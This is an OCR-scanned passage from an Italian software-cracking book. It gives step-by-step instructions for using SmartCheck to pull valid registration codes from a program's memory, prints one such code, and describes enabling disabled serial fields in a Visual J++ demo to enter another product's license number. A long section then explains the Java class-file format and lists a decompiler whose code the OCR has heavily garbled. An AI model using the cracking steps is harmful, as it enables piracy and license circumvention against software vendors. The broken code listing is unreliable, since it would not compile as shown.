tornate alla maschera di prima e 


&rnula | ? || selezionate le opzione avanzate e 


marcate le prime 4 voci mentre lasciate 


MW Report handled Visual Basic runtime errors 
Mi 


libere tutte le altre. 

Accettate la configurazione preendo OK. 

Se vi dovesse comparire il messaggio legato al fallimento delle API premete 
ACKNOWLEDGE. 

Ora fate partire con SmartCheck il programma e seguite le istruioni per 
effetture la registrazione. 

Inserite le voci "The Keyboard Caper" come NAME, "The Cracker" come COMAPNY 
e "12345" come CODE. 
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Premendo 0K vi verrà fuori la finestra che vi comunica del fallimento dei dati 
inseriti. 
Andate ora nella finestra di SmartCheck chiamata Program Results 


Vedrete 
+ mnuCode_Click 


Premete sul + per espandere il braccio. 
Tracciate in basso fino a vedere 


+ RegcodeForm.Show 


ed espandetelo anche questo premendo sul +. 
Scendete anvora fino a 


+ btnoK_Click 


o come al solito espandetelo. 
Andate in basso fino al secondo LCase$, sulla destra delle finestra dovreste 
vedere : 


String string = 0058A3DO "12345" 


Questa è la locazione (0058A3D0) dove è registrato il codice, sbagliato in 
questo caso. 

Andate in basso sul LCase$ e vedrete altri LCase$ a seguito i quali mostrano 
altri codici di registrazione. 

Prendete quello che volete, ad esempio 3882D927-9Y78-29699. 

Provate ad inserirlo e vedrete che lo prende. 


QUANDO ABILITANDO IL CAMPO DEL SERIAL NUMBER SI RISOLVE 


Esistono versioni in cui la mancanza di numero seriale inserito nell'apposito 
spazio indica al setup che si tratta di una versione demo. 

In alcuni casi sarebbe 
possibile risolvere la cosa 
potendo inserire un numero di 
serie corretto dentro 
all’apposito spazio. 

C. Show 4 Prendiamo l’esempio di una 
lee ii po versione demo dvi J++. 


Press 'On' and select a window to edit when in Select Mode'. La maschera che compare 
Use the right mouse button to bring up the Configuration menu. all’inizio si presen ta con i 


Class: [Static campi relativi al serial 
Text: [Fare clic sul pulsante Avanti per passare alla schermata succe number disabilitati. 
Mediante l'utilizzo di 
Parent Class: [k32770 customizer è possibile 
Parent Test: | abilitare tali campi. 
CUSTOMIZER permette di 
eseguire molte altre funzioni 
come ad esempio modificare il 
posizionamento degli oggetti, 
PESTE | Eeplica inviare messaggi specifici a 
ciascuno di questi e tante 
altre ancora. 
Quando viene selezionata un 
funzione in CUSTOMIZER compare un freccia come cursore che permette di 
selezionare a quale campo si riferisce la funzionalità stessa. 


The Customiser Configuration Screen 


Handle:  O0x04b4 = Top: 288 Height: 50 
(703,432) Id 655395 Left 406 Width: 359 
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Nel caso del VJ++ ho preso il numero di licenza di un altro pacchetto Microsoft 
il cui codice era 040-0923025 e l’ho inserito dopo aver abilitato all’input tali 
campi. 

Customizer è anche utile in quei casi in cui alcune funzioni sono state 
disabilitate rendendo gray l’opzione di menu. 

In latre parole in una versione dimostrativa potrebbero non avere inserito del 
dutto il codice relativo alla funzionalità mancante. 

In altri casi invece non è stata abilitata la voce di menu. 

In questo caso si potrebbe agire andando ad inserire una patch di codice. 
CUSTOMIZER facilita le cose perché permette di fare molte cose, compresa quella 
di inviare messaggi, senza dover ricorrere alla programmazione. 
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3.1.1 JAVA E SCRITTURA MODULI PER LA RETE 


Come dicevo prima i programmi JAVA non possiedono un vero e proprio compilatore 
che traduce il programma in codice macchina. 

Questo favorisce la trasportabilità del software anche se complica la sua 
protezione. 

I files .CLASS mantengono al loro interno tutte le informazioni dalle quali è 
possibile risalire ai sorgenti. 

Il linguaggio Java e’ portabile in quanto il suo compilatore crea un file che 
contiene un pseudocodice che verra’ interpretato dalle varie macchine virtuali 
presenti nei vari ambienti. 

Qusto pseudocodice prende il nome di bytecode ed e’ contenuto nei vari file 
.class che compongono il programma. 

Il codice sorgente puo’ essere rappresentato da un unico file .java o da diversi 
file contenenti ciascuno le varie classi. 

Nel caso di un unico file .java il compilatore creera’ in vari file .class il 
cui nome derivera’ dal nome della classe. 

Il file contenente la classe principale dovra’ possedere il nome del file uguale 
a quello della classe. 

Nel caso in cui in un unico file java siano presenti piu’ classi almeno una, e 
non piu’ di una, dovra’ possedere l’attributo public. 

Il compilatore in pratica analizzera’ il sorgente e creera’ un file la cui 
struttura interna dovra’ essere compatibile con quella definita dalla SUN per il 
codice bytecode. 

Per discutere su tale formato presenteremo il codice di un programma .java che 
leggera’ il contenuto di un file .class e visualizzera’ le classi e le variabili 
in questo contenute. 

Il programma che ho scritto come esempio e’ una base per la scrittura di un 
decompilatore completo che per la sua lunghezza non puo’ essere trattato in 
queste pagine. 

I dati che formano tale struttura sono rappresentati, nelle specifiche SUN, da 
ul, u2, u4 che sono in pratica unisgned da 1 byte, unsigned da 2 bytes e 
unsigned da 4 bytes leggibili da file mediante i metodi, della classe 
RandomAccessFile, 


readUnsignedByte() 
readUnsignedShort() 
readInt() 


Vediamo subito la struttura. 


ClassFile { 
u4 magic; 
u2 minor_version; 
u2 major_version; 
u2 constant_pool count; 
cp_info constant_pool[constant_pool_count-1]; 
u2 access_flags; 
u2 this_class; 
u2 super_class; 
u2 interfaces_count; 
u2 interfaces[interfaces_count]; 
u2 fields_count; 
field_info fields[fields_count]; 
u2 methods_count; 
method_info methods[methods_count]; 
u2 attributes_count; 
attribute _info attributes[attributes_count]; 
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Il significato dei fari campi sono 

unsigned 4 bytes magic number. 

Questo campo contiene la stringa rappresentata da numeri esadecimali 

OxCA OxFE OxBA OxBE 

in pratica CAFEBAE. 

Attenzione che CAFEBABE non sono caratteri ASCII ma i vari 4 numeri da 1 byte in 
formato esadecimale visti uno a fianco all'’altro come se fossero i caratteri di 
una stringa. 

Una volta aperto il file .class con la funzione RandomAccessFile( ) 


in = new RandomAccessFile(className, "r"); 


I due dati successivi costituiscono la parte minore e maggiore del numero di 
versione del compilatore. 


U2 minor_version e u2 major_version 
Un dato importantissimo e’ 


U2 ConstantPoolCount 


in readUnsignedByte( 
in.readUnsignedByte) 


In readUnsignedByte() 
in.readUnsignedByte0 PI Hum elementi in Constant Pool Table 


= CA FE BA BE 


ce 


fmi decomplava.eiscs 


00000000 X 00 04 43 I Cod 
00000010 69 6C 65 : e. 


o O 3 
00000020 09 53 6F 75 72) 63 65 d4 69 72 DI 00 OD 43 .SourceDìir...Con 
00000030 73 74 61 6E 74| 56/61 6C 75 65 D1 00 0A 45 stantValue. , .Exc 


‘in.readUnsignedSshort() 
» MIN AND MAJ VERSION HUMBER 


Il quale rappresenta il numero degli elementi nella tabella che andremo a 
creare. 

Dal file .class e’ possibile creare quella definita come constant pool table che 
altro non e’ che una tabella con tutti i dati, metodi, variabili di una classe. 
Per creare questa tabella ho creato una classe che contiene questi dati. 

Ogni volta che sara’ necessario creare un altro elemento di questa tabella verra 
creata una nuova istanza di questa classe, verranno assegnati i valori necessari 
(gli altri sono messi a 0 o a null) e poi verra’ aggiunta come successivo 
elemento di un vettore Vector. 

In seguito quando sara’ necessario reperire una stringa, ad esempio, in questa 
tabella, una volta ricavato il numero di posizionamento sara’ possibile estrarne 
il valore mediante il metodo elementAt() della classe Vector. 

Ad esempio la classe dei dati contiene un membro str destinato alla 
memorizzazione delle stinghe. 

Supponiamo di ricavare il valore di indice di una stringa con una lettura da 
file 


Int super class = in.readUnsignedShort(); 
decompJavaData tmp = (decompJavaData) classTable.elementAt(super_class); 


System.aout.print(tmp.str); 
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// str e’ il membro String nella classe decompJavaData ... 

// quella che contiene i dati 

// usata un po a modo di struttura del C per la creazione della constant pool 
table 

Spesso per ricavare un dato, ad esempio il nome di una classe, e’ necessario 
leggere un dato che rappresenta l’ indirrizzo della stringa in questa tabella. 
Per prima cosa sara’ quindi necessario creare un vettore in cui verranno 
inseriti i dati letti. 

La prima passata servira’ appunto a questo scopo. 

Il programma e’ costituito da un gestore iniziale del layout che permettera’ di 
creare una maschera su cui sono posizionati il campo (TextField) da cui leggere 
il nome della classe da analizzare, da un pulsante per iniziare tale analisi e 
da un area di testo in cui verranno visualizzate le informazioni create dal 
metodo principale, quello che esegue l’ analisi chiamato readClass(). 

Vediamo subito tutto il codice in un sol colpo. 

Discuteremo dopo delle varie funzioni o metodi. 


Alcuni dati inseriti nella constant pool table (da adesso la chiamero’ CPT) 


hanno significati particolari. 

Tra questi valori ritroviamo 

INFINITO POSITIVO = POS_INF (1.0f / 0.0f) 
INFINITO NEGATIVO = NEG_INF (-1.0f / 0.0f) 


NON UN NUMERO NaN (Not a number) (0.0f / 0.0f) 


Il seguente programma, che ho scritto usando JAVA stesso, analizza i files 


. CLASS. 


DECOMPJAVA. JAVA 


import 
import 
import 
import 
import 
import 


java. 
java. 
java. 
java. 
java. 
java. 


applet .*; 
ant. *; 
awt.event.*; 
LO 

net.*; 
util.*; 


class decompJavaData 


i 
public String Str; 
public int tag; 
public short u21, U22; 
public int u41, U42; 
public float fj; 
public double d; 
public long di; 
public decompJavaData(int tag, short u21, short u22, int u41, int u42, 
String stringa, float f, double d, long 1) 
this.tag = tag; 
this.Uu21 = U21; 
this.u22 = u22; 
this.u41 = U41; 
this.u42 = u42; 
if(stringa != null) { 
this.str = new String(stringa); 
} else 
this.str = null; 
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this.f = fj; 
this.d = d; 
this.l1 = 1; 


} 


class decompJavaFrame extends Frame implements WindowListener, ActionListener 


È 


private TextArea textfield1; 

private Button leggi; 

private TextField classe; 

private Vector classTable; 

private RandomAccessFile in = null; 

private decompJavaData tmp; 

private String thisClassName; 

// Costanti 

final byte CONSTANT_Class = 7; 
final byte CONSTANT_Fieldref = 9; 
final byte CONSTANT_Methodref = 10; 
final byte CONSTANT_InterfaceMethodref = 11; 
final byte CONSTANT_String = 8; 
final byte CONSTANT_Integer = 3; 
final byte CONSTANT_Float = 4j 
final byte CONSTANT_Long = 5; 
final byte CONSTANT_Double = 6; 
final byte CONSTANT_NameAndType = 12; 
public static final byte CONSTANT_Utf8 = 1; 


private int numConstantPool; 


public String removeSlash(String stringa) 


{ 


} 


StringBuffer strBuf = new StringBuffer(); 
for(int idx=0;idx!=stringa.length();idx++) 
if(stringa.charAt(idx) == '/') 
strBuf.append('.'); 
else 
strBuf.append(stringa.charAt(idx)); 
return strBuf.toString(); 


public decompJavaFrame( ) 


{ 


} 


super("javaDecompiler by F. Bernardotti"); 
setLayout(new BorderLayout()); 
Panel panel = new Panel(); 

Label lab = new Label("Nome classe :"); 
panel.add(lab); 

classe = new TextField("classe.class", 50); 
panel.add(classe); 

leggi = new Button("Leggi"); 
panel.add(leggi); 

add(panel, "North"); 

textfield1 = new TextArea(18, 50); 
add(textfieldi, "South"); 
leggi.addActionListener(this); 
textfield1.setBackground(new Color(0,60,0)); 
textfield1.setForeground(new Color(0,255,0)); 
addwindowListener(this); 


String extractClassName(String stringa) 


{ 
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} 


int idx = stringa.length()-1; 


while(true) 


{ 


if(stringa.charAt(idx) == '.') 
return stringa.substring(idx+1); 


if(idx 


--idx; 


0) 


return stringa; 


String analizeString(String stringa) 


{ 


1)); 


} 
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boolean flag 
StringBuffer 
StringBuffer 
StringBuffer 
int idx=0; 
while(flag) 
if(idx 


} else 


} 


++idx; 


= true; 

strBuf = new StringBuffer(); 

array = new StringBuffer(); 

type = new StringBuffer(); 
i 
== stringa.length()) { 
flag = false; 
{ 
switch(stringa.charAt(idx)) { 
case ‘'['!: 
array.append("[]"); 
break; 

case ‘'B'!: 
type.append("byte"); 
break; 

case ‘'C': 
type. append("char"); 
break; 

case ‘'D': 
type.append("double"); 
break; 

case ‘'F!: 
type.append("float"); 
break; 

case ‘'I': 
type.append("int"); 
break; 

case "'J': 
type.append("long"); 
break; 

case "'S': 
type.append("short"); 
break; 

case “'Z!: 
type.append("boolean"); 
break; 

case “"L': 
type.append(stringa.substring(1, 
flag = false; 
break; 

} 


strBuf.append(type.toString()); 
if(array.length() > 0) 

strBuf.append(array.toString()); 
return (strBuf.toString()); 


stringa 


.length()- 


private String analizeMethods(String name, String arguments) 
{ 

boolean flag = true; 

int numEle; 

StringBuffer strArg; 

StringBuffer strBuf = new StringBuffer(); 

StringBuffer strArg1 = new StringBuffer(); 

StringBuffer tmp2 = new StringBuffer(); 

StringBuffer tmp3 = new StringBuffer(); 

String tmp = new String(); 

int idx = 0; 

while(arguments.charAt(idx) != ')' && idx <= arguments.length()) 

strArg1.append(arguments.charAt(idx++)); 


++idx; 
while(idx != arguments.length()) 
strBuf.append(arguments.charAt(idx++)); 
idx = 0; 
strArg = new StringBuffer(); 
while(flag) { 
switch(strBuf.charAt(idx)) 
{ 
case '['!: 
strArg.append("[]"); 
++idx; 


case "'L': 
= strBuf.toString(); 
tmp = tmp.substring(1); 
= removeSlash(tmp); 
tmp = extractClassName(tmp); 
strArg.append(tmp); 


case "'V'!: 
strArg.append("void"); 
flag = false; 


case "'B': 
strArg.append("byte"); 
flag = false; 


case ‘'C'!: 
strArg.append("char"); 
flag = false; 


case 'D': 
strArg.append("double"); 
flag = false; 


case ‘'F'!: 
strArg.append("float"); 
flag = false; 


case "'I'!: 
strArg.append("int"); 
flag = false; 


case "J': 


strArg.append("long "); 
flag = false; 
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case ‘S': 


strArg.append("short"); 
flag = false; 


break; 


case “'Z': 


strArg.append( "boolean "); 
flag = false; 


if(name.equals("<init>") || name.equals("<clinit>")) 


strArg.append(thisClassName); 


strArg.append(name); 


break; 
} 
} 
strArg.append(" "); 
else 
idx = 
tmp = 


strArg1l.toString(); 


strArg.append('('); 


numEle = 0; 


while(idx < tmp.length()) { 
switch(tmp.charAt(idx)) 


case 


case 


case 


case 


case 


case 


case 


case 


AYAS: 

if(numEle > 0) 
strArg.append(", "); 

strArg.append( "void "); 

break; 

'B!: 

if(numEle > 0) 
strArg.append(", "); 

strArg.append( "byte "); 

break; 

Mo: 

if(numEle > 0) 
strArg.append(", "); 

strArg.append( "char "); 

break; 

'D': 

if(numEle > 0) 
strArg.append(", "); 

strArg.append("double "); 

break; 

E 

if(numEle > 0) 
strArg.append(", "); 

strArg.append("float "); 

break; 

LE: 

if(numEle > 0) 
strArg.append(", "); 

strArg.append("int "); 

break; 

Le 

if(numEle > 0) 
strArg.append(", "); 

strArg.append("long "); 

break; 

SE: 

if(numEle > 0) 
strArg.append(", "); 

strArg.append("short "); 

break; 


case 'Z!: 
if(numEle > 0) 
strArg.append(", "); 
strArg.append("long "); 
break; 
case ‘'L': 
if(numEle > 0) 
strArg.append(", "); 
++idx; 
tmp2 = new StringBuffer(); 


while(true) { 


if(tmp.charAt(idx) == ';') 

break; 
tmp2.append(tmp.charAt(idx)); 
++idx; 


} 

tmp3 = new 
StringBuffer(removeSlash(tmp2.toString())); 

strArg.append(extractClassName(tmp3.toString())); 


break; 
} 
++numEle; 
++idx; 


} 
strArg.append(")"); 
return (strArg.toString()); 


public void readClass(String className) 
{ 
char c; 
int byteRead; 
StringBuffer strBuf; 
URL tmpURL = null; 
String msg; 
String stringa; 
int value; 
int tag; 
short u21, Uu22; 
int u41, U42; 
float f; 
double d; 
long 1; 
int attribute_name_index; 
int attribute_code_length; 
int name_index; 
int access_flag; 
int super_class; 
int this_class; 
int interfaces_count; 
int idx; 
int idx1; 
int idx2; 
int idx3; 
int name_at; 
int fields_count; 
int fields_access_flag; 
int descriptor_index; 
int attribute_count; 
int attribute _length; 
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int methods_count; 

int methods_access_flag; 

int length_attribute; 

int attribute_len; 

int source _file_index; 

String tmpStr; 

try 

È 
classTable = new Vector(); 
in = new RandomAccessFile(className, "r"); 
textfield1.append("\n--------------------------------.--.----- 


Fasi) 
textfield1.append("JAVADECOMPILER by F.BERNARDOTTI\n"); 
textfield1.append("----------------------------.------------- 
--\n"); 
textfield1.append("File name :" + className+"\n"); 
in.skipBytes(8); 
} 
catch(MalformedURLException e) {} 
catch(FileNotFoundException e) {} 
catch(IOException e) {} 
textfield1.append("\nCreating constant pool ...\n\n"}); 
tmp = new decompJavaData(0, (short) ©, (short) 0, 0, 0, null, 0.0f , 
0.0, OL); 


// Una usata da JAVA VM 
classTable.addElement(tmp); 
// e una usata da me per far iniziare l' indice a 1 
classTable.addElement(tmp); 
byteRead = 0; 
for(int index=1;index != numConstantPool;index++) { 
tag = u41 = u42 = 0; 
u21 = u22 = 0; 
stringa = null; 


f=0.0f; 
d= 0.0; 
l = OL; 
try { 
++byteRead; 


tag = in.readUnsignedByte() & Oxff; 
switch(tag) { 
case CONSTANT_Class: 
byteRead += 2; 
// name_index 
u21 = (short) in.readunsignedshort(); 
break; 
case CONSTANT_String: 
byteRead += 2; 
// name_index 
u21 = (short) in.readunsignedshort(); 
break; 
case CONSTANT_NameAndType: 
case CONSTANT_Fieldref: 
case CONSTANT_Methodref: 
case CONSTANT_InterfaceMethodref: 
byteRead += 4; 
// Class index 
u21 = (short) in.readunsignedshort(); 
// name_and_type 
u22 = (short) in.readunsignedshort(); 
break; 
case CONSTANT_Integer: 
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byteRead += 4; 
value = in.readunsignedShort(); 
u41 = ((value << 16) + (short) 
in.readUunsignedShort()); 
break; 
case CONSTANT_Float: 
byteRead += 4; 
value = in.readunsignedShort(); 
u41 = ((value << 16) + (short) 
in.readUunsignedShort()); 
if(U41 == 0x7f800000) 
// Positive infinity 
f = 1.0f/0.0f; 
else 
if(U41 == 0xff800000) 
// Negativi infinity 
f = -1.0f/0.0f; 
else 
if((u41 >= 0x7f800000 && u41 <= 
Ox7ffFfFFfFFF) ||(u41 >= 0xff800001 && u41 <= Oxffffffff)) 
// NaN (NotANumber ) 
f = 0.0f/0.0f; 


else { 
int s = ((U41 >> 31) == 0) ? 1: 
-1j 
int e = ((u41 >> 23) & Oxff); 
int m = (e == 0) ? (u41 & 


Ox7fffff) << 1: (Uu41 & Ox7fffff) | 0x800000; 
f = (float)((float)s * (float) m 
FA 1600) 


break; 
case CONSTANT_Long: 
byteRead += 8; 
u41 = in.readInt(); 
u42 = in.readInt(); 
1 = ((long) u41 << 32) + u42; 
break; 
case CONSTANT_Double: 
byteRead += 8; 
u41 = in.readInt(); 
u42 = in.readInt(); 
1 = ((long) u41 << 32) + u42; 
if(1 == 0x7f80000000000000L) 
// Positive infinity 
d = 1.0/0.0; 
else 
if(1 == 0xff80000000000000L) 
// Negative infinity 
d = -1.0/0.0; 
else 
if((1 >= 0x7ff0000000000001L && 1 <= 
Ox7FFFFFFFFFFFFFFFL ) ||(1 >= Oxfff0000000000001L && 1 <= OxfffffffffffoffffL)) 
// NaN (NotANumber ) 
d = 0.0/0.0; 
else { 
long s = ((1 >> 63) == 0) ? 1: - 
1; 
long e = ((1l >> 52) & Ox7ff); 
long m = (e == 0) ? (D1& 
OxFFFFFFFAfAAfFAL) << 1: (1 & OxffffffffffffL) | 0x10000000000000L; 
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d = (double)((double)s * 
(double) m * (2 A (e - 1075))); 


break; 
case CONSTANT_Utf8: 
u21 = (short) in.readunsignedshort(); 
byteRead += u21; 
strBuf = new StringBuffer(u21); 
for(idx=0;idx!=u21;idx++) { 
c = (char) in.readByte(); 
strBuf.append(c); 
} 
stringa = new String(strBuf.toString()); 
break; 


} 
} catch(IOException e) {} 
tmp = new decompJavaData(tag, u21, u22, u41, u42, stringa, 
d, 1); 
classTable.addElement(tmp); 


strBuf = new StringBuffer(); 

access_flag = in.readUnsignedShort(); 

if((access_flag & 0x0001) == 0x0001) 
strBuf.append("public "); 

if((access_flag & 0x0010) == 0x0010) 
strBuf.append("final "); 

if((access_flag & 0x0020) == 0x0020) 
strBuf.append("class "); 

if((access_flag & 0x0200) == 0x0200) 
strBuf.append("interface "); 

if((access_flag & 0x0400) == 0x0400) 
strBuf.append("abstract "); 

this_class = in.readUnsignedShort(); 

tmp = (decompJavaData) classTable.elementAt(this_class); 

thisClassName = new String(tmp.str); 

strBuf.append(thisClassName); 

textfield1.append(strBuf.toString( 

super_class = in.readUnsignedShort 

if(super_class != 0) { 
tmp = (decompJavaData) 

classTable.elementAt(super_class); 

textfield1.append(" extends "); 
tmpStr = removeSlash(tmp.str); 
textfield1.append(extractClassName(tmpStr)); 


)); 
(); 


} 


interfaces_count = in.readUnsignedShort(); 
if(interfaces_count != 0) { 
textfield1.append(" implements "); 
for(idx = 0; idx != interfaces_count;idx++) { 
name_at = in.readunsignedShort(); 
tmp = (decompJavaData) 
classTable.elementAt(name_at); 
if(idx > 0) { 
textfield1.append(", "); 
ti 


tmpStr = removeSlash(tmp.str); 
textfield1i.append(extractClassName(tmpStr)); 


i: 
textfield1.append("\n{\n"}); 
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Variable(s)\n// --------------------- \n\n"}); 


fields_ count 


= in.readUnsignedShort(); 


if(fields_count > 0) { 


for(id 


x=0;idx!=fields_count;idx++) { 


fields_access_flag = in.readUunsignedshort(); 
textfield1l.append("\t"); 


if((fields_ access _flag & 0x0001) == 0x0001) 
textfield1.append("public "); 
if((fields_access_flag & 0x0002) == 0x0002) 
textfield1.append("private "); 
if((fields_access_flag & 0x0004) == 0x0004) 
textfield1.append("protected "); 
if((fields_access_flag & 0x0008) == 0x0008) 
textfield1l.append("static "); 
if((fields_access_flag & 0x0010) == 0x0010) 
textfield1.append("final "); 
if((fields_ access _flag & 0x0040) == 0x00040) 
textfield1l.append("volatile "); 
if((fields_access_flag & 0x0080) == 0x0080) 
textfield1.append("transient "); 


name_index = in.readUnsignedShort(); 
descriptor_index = in.readUnsignedShort(); 


tmp = (decompJavaData) 


classTable.elementAt(descriptor_index+1); 


tmpStr = new 


String(removeSlash(analizeString(tmp.str))); 


textfield1.append(extractClassName(tmpStr)); 


tmp = (decompJavaData) 


classTable.elementAt(name_index+1); 


in.readUnsignedShort(); 


textfield1.append(" " + tmp.str+";"); 


attribute _ count = in.readUnsignedShort(); 
if(attribute_count > 0) { 


for(idx1=0;idx1!=attribute_count;idx1++) 


attribute _name_index = 


tmp = (decompJavaData) 


classTable.elementAt(name_index); 


textfield1.append(tmp.str); 
attribute_length = in.readInt(); 
strBuf = new 


StringBuffer(attribute_length); 


for(idx2=0;idx2!=attribute_length;idx2++) { 


String(strBuf.toString()); 
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c = (char) in.readByte(); 
strBuf.append(c); 
; 


stringa = new 


textfield1.append(stringa); 


hs 
textfield1.append("\n"); 


} 


Method(s)\n// --------------------- \n\n"}); 
methods_count = in.readUnsignedShort(); 


if(methods_count > 0) { 
for(idx1=0;idx1!=methods_count;idx1++) { 


methods_access_flag = in.readUnsignedShort(); 


textfield1l.append("\t"); 
if((methods_access_flag & 0x0001) == 0x0001) 
textfield1.append("public "); 
if((methods_access_flag & 0x0002) == 0x0002) 
textfield1l.append("private "); 
if((methods_access_flag & 0x0004) == 0x0004) 
textfield1.append("protected "); 
if((methods_access_flag & 0x0008) == 0x0008) 
textfield1l.append("static "); 
if((methods_access_flag & 0x0010) == 0x0010) 
textfield1.append("final "); 
if((methods_access_flag & 0x0020) == 0x0020) 
textfield1.append("synchronized "); 
if((methods_access_flag & 0x0100) == 0x0100) 
textfield1l.append("native "); 
if((methods_access_flag & 0x0400) == 0x0400) 
textfield1l.append("abstract "); 


name_index = in.readUnsignedShort(); 
descriptor_index = in.readUnsignedShort(); 


tmp = (decompJavaData) 
classTable.elementAt(descriptor_index+1); 


tmpStr = new 
String(removeSlash(analizeString(tmp.str))); 

tmpStr = tmp.str; 

tmp = (decompJavaData) 
classTable.elementAt(name_index+1); 

tmpStr = analizeMethods(tmp.str, tmpStr); 


textfield1.append(tmpStr); 


attribute _ count = in.readUnsignedShort(); 
if(attribute_count > 0) { 
for(idx2=0;idx2!=attribute_count;idx2++) { 
attribute_name_index = 
in.readUunsignedShort(); 
tmp = (decompJavaData) 
classTable.elementAt(attribute_name_index+1); 
length_attribute = in.readInt(); 
in.skipBytes(length_attribute); 
} 


ii 
textfield1.append(" {}\n"}); 


} 


attribute_count = in.readUnsignedShort(); 
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if(attribute_count > 0) { 
for(idx2=0;idx2!=attribute_count;idx2++) { 

attribute_name_index = in.readUnsignedShort(); 

tmp = (decompJavaData) 
classTable.elementAt(attribute_name_index+1); 

attribute _len = in.readUnsignedShort(); 

source _file_ index = in.readUnsignedShort(); 

tmp = (decompJavaData) 
classTable.elementAt(source_ file _index+1); 


3 
3 
} catch(IOException e) {} 


textfield1.append("\n}\n"}); 


try 
in.close(); 


} 
catch(IOException e) {} 
} 


public void actionPerformed(ActionEvent e) 


String choicesString; 
String selected = e.getActionCommand(); 
if(selected.equals("Leggi")) { 
String className = classe.getText(); 
if(className.length() > 0) 
readClass(className); 


} 


public void windowActivated(WindoweEvent event) {} 

public void windowClosed(WindoweEvent event) {} 

public void windowClosing(Windowevent event) { dispose(); } 
public void windowbeactivated(Windowevent event) {} 

public void windowbeiconified(Windowevent event) {} 

public void windowIconified(WindoweEvent event) {} 

public void windowopened(Windowevent event) {} 


i; 
public class decompJava extends Applet 


{ 


private boolean m_fStandAlone = false; 

private String m_classfile = ""; 

private final String PARAM classfile = "classfile"; 
String GetParameter(String strName, String[] args) 


if (args == null) 
{ 


return getParameter(strName); 


} 
int ij 
String strArg = strName + "="; 


String strValue 
int nLength 


null; 
strArg.length(); 
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for (i = 0; i < args.length; i++) 


{ 


String strParam = args[i].substring(0, nLength); 
if (strArg.equalsIgnoreCase(strParam)) 


strValue = args[i].substring(nLength); 
if (strValue.startswith("\"")) 


strValue = strValue.substring(1); 
if (strValue.endsWwith("\""})) 
strValue = strValue.substring(0, 
strValue.length() - 1); 


break; 


} 


catch (Exception e) {} 


return strValue; 


} 


void GetParameters(String[] args) 
String param; 


param = GetParameter(PARAM_classfile, args); 
if (param != null) 
m_classfile = param; 


3 


public static void main(String[] args) 

{ 
decompJavaFrame frame = new decompJavaFrame(); 
decompJava applet_decompJava = new decompJava(); 
frame.add("Center", applet_decompJava); 
applet_decompJava.m_fStandAlone = true; 
applet_decompJava.GetParameters(args); 
applet_decompJava.init(); 

frame.setVisible(true); 

frame.setSize(500, 330); 


i; 
public String getAppletInfo() 
L 
return "Name: decompJava\r\n" + 
"Author: Flavio Bernardotti.\r\n" + 
"Created with Microsoft Visual J++ Version 1.1"; 
} 


public String[][] getParameterInfo() 
String[][] info = 


{ PARAM _classfile, "String", "Parameter description" }, 


}i 

return info; 
} 
public void init() 
{ 


Pagina 429 di 991 


if (!m_fStandAlone) 
GetParameters(null); 


} 


Eravamo rimasti al magic number e alla versione del compilatore. 

Il valore successivo da leggere e’ quello che rappresenta il numero delle voci 
della CPT. 

L’ elemento 0 viene utilizzato dalla macchina virtuale Java per cui il primo 
elemento da noi inserito avra’ come indice 1. 

Il numero degli elementi ci servira’ a leggere un numero di strutture a 
lunghezza variabile rappresentate come segue 


cp_info { 
ul tag; 
ul info[]; 


i 


Il primo valore rappresenta la tipologia della voce e precisamente 


CONSTANT_Class 
CONSTANT_Fieldref 
CONSTANT_Methodref 
CONSTANT_InterfaceMethodref 
CONSTANT_String 
CONSTANT_Integer 
CONSTANT_Float 
CONSTANT_Long 
CONSTANT_Double 
CONSTANT_NameAndType 
CONSTANT_Utf8 


he 


PROSS EE ISOI 


U1 info[] assume una struttura diversa a seconda del tag. 
La parte del codice che si interessa di creare le voci e’ quella che inizia con: 


for(int index=1;index != numConstantPool;index++) { 
tag = u41 = u42 = 0; 


u2z1 = u22 = 0; 
stringa = null; 


f= 0.0f; 
d= 0.0; 
1 = OL; 
try { 
++byteRead; 


tag = in.readUnsignedByte() & Oxff; 


switch(tag) { 
case CONSTANT_Class: 
byteRead += 2; 


Nel case di un tag di tipo [MONSMANMGNaSS la struttura e’ 


CONSTANT_Class_info { 
ul tag; 
uz name_index; 
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PA 


Dove trovate name_index significa che il riferimento al numero di elemento 
della CPT dove si trova la specifica. 
La rappresentazione e’ particolare. 


Le tipologie dei dati sono 


B byte signed byte 

Cc char character 

D double double-precision IEEE 754 float 
F float single-precision IEEE 754 float 
I int integer 

J long long integer 

L<classname>; +... an instance of the class 
Ss short signed short 

Z boolean true or false 

[ one array dimension 


Gli array vengono rappresentati come segue. 
Ad esempio 


Double d[][][] [[[D 
Oppure un riferimento ad una classe del tipo 
Java.awt.String Ljava/awt/String; 


Le funzioni analizeString() analizeMethods() servono appunto a riportare a 
formato normale tali notazioni. 


Le strutture dei tag 
possiedono la seguente struttura : 


CONSTANT_Fieldref_info { 
ul tag; 
u2 class_index; 
u2 name_and_type_index; 


CONSTANT_Methodref_info { 
ul tag; 
u2 class_index; 
u2 name_and_type_index; 


CONSTANT_InterfaceMethodref_info { 
ul tag; 
u2 class_index; 
u2 name_and_type_index; 


} 


class_index e name_and_type_index rappresentano sempre gli indici d’ accesso 
alla CPT. 
Un altro tag e’ dato da [ONSMANMESERENS che e’ utilizzato per rappresentare gli 
oggetti di tipo java.lang.String 
CONSTANT_String_info { 

ul tag; 

u2 string_index; 


} 
I tag CONSTANTINE utilizzano invece la seguente struttura. 
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CONSTANT_Integer_info { 


ul tag; 
u4 bytes; 
} 
CONSTANT_Float_info { 
ul tag; 
u4 bytes; 


} 


Dove nel caso dell’ intero u4 e’ il valore. 
Nel caso del float assume i seguenti valori. 


Se l'argomento e’ 0x7f800000 , il valore del float e’ un infinito positivo. 
Se il valore e’ 0xff800000 , il float e’ un infinito negativo. 
. Se l'argomento e’ compreso tra 0x7f800001 e Ox7fffffff oppure tra 
0xff800001 e Oxffffffff , il valore e un Nan. 
Negli altri casi 


int s = ((bytes >> 31) == 0) ? 1 :: -1; 
int e = ((bytes >> 23) & Oxff); 
int m = (e == 0) ? 


(bytes & Ox7fffff) << 1: 
(bytes & Ox7fffff) | 0x800000; 


Il valore viene dato da S * M * 2 A (E - 150) 


Nei casi di un RINSTANNONI ENO CONSTANADONENE ;) discorso e’ un po come il 


precedente 


CONSTANT_Long_info { 
ul tag; 
u4 high_bytes; 
u4 low_bytes; 


CONSTANT_Double_info { 
ul tag; 
u4 high_bytes; 
u4 low_bytes; 
} 


Nel caso di un double il valore viene dato da 


Se l’argomento e’ 0x7f80000000000000L, il valore del float e’ un infinito 
positivo. 

Se il valore e’ 0xff80000000000000L , il float e’ un infinito negativo. 

Se l'argomento e’ compreso tra 0x7ffoo00000000000I1L e Ox7fFffffffffmffffff. 
